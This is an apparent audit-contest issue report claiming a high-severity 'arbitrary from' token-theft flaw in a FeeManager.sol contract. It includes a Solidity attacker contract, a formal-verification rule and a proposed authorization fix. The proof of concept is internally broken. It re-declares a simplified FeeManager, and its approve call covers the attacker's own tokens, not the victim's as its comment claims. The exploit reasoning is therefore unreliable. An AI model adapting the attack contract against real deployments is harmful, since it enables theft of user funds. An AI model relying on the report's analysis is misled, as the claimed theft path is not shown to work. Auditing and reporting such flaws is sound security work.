### ISSUE TITLE
0bing076 - H-1: Arbitrary `from` passed to `transferFrom` (or `safeTransferFrom`)

### ISSUE THREAD

**Issue by sherlock-admin3** [sherlock-audit/2024-04-titles-judging#54]
0bing076

high

# ## H-1: Arbitrary `from` passed to `transferFrom` (or `safeTransferFrom`)

## Summary

This report details a critical vulnerability in the FeeManager.sol contract that allows an attacker to transfer tokens without authorization.

## Vulnerability Detail
- Found in https://github.com/sherlock-audit/2024-04-titles/blob/main/wallflower-contract-v2/src/fees/FeeManager.sol?plain=1#L465
 Label: security, high-severity
 Line: 465

Passing an arbitrary `from` address to `safeTransferFrom` can lead to loss of funds, as anyone can transfer tokens from the `from` address if an approval is made. This means an attacker can manipulate this address to initiate unauthorized token transfers from any user's wallet, as long as the attacker has previously gained approval to transfer tokens from that wallet.
## Impact
This vulnerability is rated High because exploitation of this vulnerability could  potentially lead to attackers draining tokens from any user's wallet resulting to significant financial losses. Unauthorized transfers can disrupt the intended functionality of the FeeManager.sol contract. If exploited, this vulnerability could lower user trust and potentially lead to a decrease in user adoption of the protocol.
## Code Snippet

```solidity
asset_.safeTransferFrom(from_, to_, amount_);
```

## Tool used
Certora for Formal Verification
Manual review
**Proof of Concept**
In a scenario where an approval is made for a from address. With the current implementation of the `safeTransferFrom` function, where any address can initiate a transfer from the from address. This vulnerability could lead to the theft of a significant amount of tokens from any user who has previously granted approvals.
Exploit Scenario:

1. **Initial Setup**: Let`s assume **Address A** has a balance of tokens in the FeeManager.sol contract**. Address A** approves **Address B** to spend a certain amount of tokens on their behalf.

2. A malicious actor:**Address C**, who is not approved by **Address A**, prepares to exploit the vulnerability.

3. **Exploiting the Vulnerability**: **Address C** calls the` safeTransferFrom` function within the FeeManager.sol contract, specifying **Address A** as the from_ address, any desired recipient address as the `to_ address`, and the amount of tokens they wish to steal from **Address A**.

4. **Execution**: Due to the lack of proper access control within the `safeTransferFrom` function, the transaction from **Address C** succeeds. This allows **Address C** to transfer tokens from **Address A** to the specified recipient address without **Address A's** authorization.

5. **Final outcome**: **Address C** successfully steals tokens from **Address A** without authorization, this shows that there is a vulnerability in the FeeManager.sol contract.

The example attack would look like this:
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract FeeManager {
    using SafeERC20 for IERC20;

    function safeTransferFrom(address from_, address to_, uint256 amount_) public {
        IERC20 asset_ = IERC20(0x...); // Token address
        asset_.safeTransferFrom(from_, to_, amount_);
    }
}

contract Attacker {
    FeeManager public feeManager;
    IERC20 public token;

    constructor(address _feeManager, address _token) {
        feeManager = FeeManager(_feeManager);
        token = IERC20(_token);
    }

    function exploit(address victim, uint256 amount) external {
        // Approve the FeeManager contract to spend the victim's tokens
        token.approve(address(feeManager), amount);

        // Call the vulnerable safeTransferFrom function with the victim's address
        feeManager.safeTransferFrom(victim, address(this), amount);
    }
}

```

```solidity
// @title Demonstrates vulnerability: transferFrom can be used to steal tokens
rule vulnerabilityInTransferFrom(address attacker, address victim, uint256 amount) {
    env e;

    uint256 victimBalanceBefore = balanceOf(victim);
    uint256 attackerBalanceBefore = balanceOf(attacker);

    // Exploiting the Vulnerability
    transferFrom(e, victim, attacker, amount);

    uint256 victimBalanceAfter = balanceOf(victim);
    uint256 attackerBalanceAfter = balanceOf(attacker);

    assert (
        victimBalanceBefore - amount == victimBalanceAfter &&
        attackerBalanceBefore + amount == attackerBalanceAfter
    ),
    "vulnerability detected: attacker was able to steal tokens from victim";
}
 ```

## Recommendation
My recommended mitigation for this vulnerability is to add a check in the `safeTransferFrom` function to ensure that the `from address` is not arbitrary. This could be done by checking that the from address is either the sender of the transaction (msg.sender) or an address that is authorized by the sender. Here's an example of how this could be implemented:

```solidity
function safeTransferFrom(address from_, address to_, uint256 amount_) public {
    require(from_ == msg.sender || isAuthorized[msg.sender][from_], "Caller is not owner nor approved");
    asset_.safeTransferFrom(from_, to_, amount_);
}

```
We could check for authorization using the `require` statement, which checks if the `from_ address` is either the` msg.sender` (the caller of the function) or an address that is authorized by the `msg.sender`. This ensures that only the owner of the tokens or an authorized address can initiate the transfer.
The `isAuthorized` mapping should be defined in your contract to keep track of which addresses are authorized to transfer tokens on behalf of others. This mapping should be updated whenever an address is authorized or deauthorized.
```solidity
mapping(address => mapping(address => bool)) public isAuthorized;

function authorize(address from_) public {
    isAuthorized[msg.sender][from_] = true;
}

function deauthorize(address from_) public {
    isAuthorized[msg.sender][from_] = false;
}
```
To summarize, I would say by implementing this check, you can prevent unauthorized addresses from initiating transfers from the from address, thereby mitigating the vulnerability.
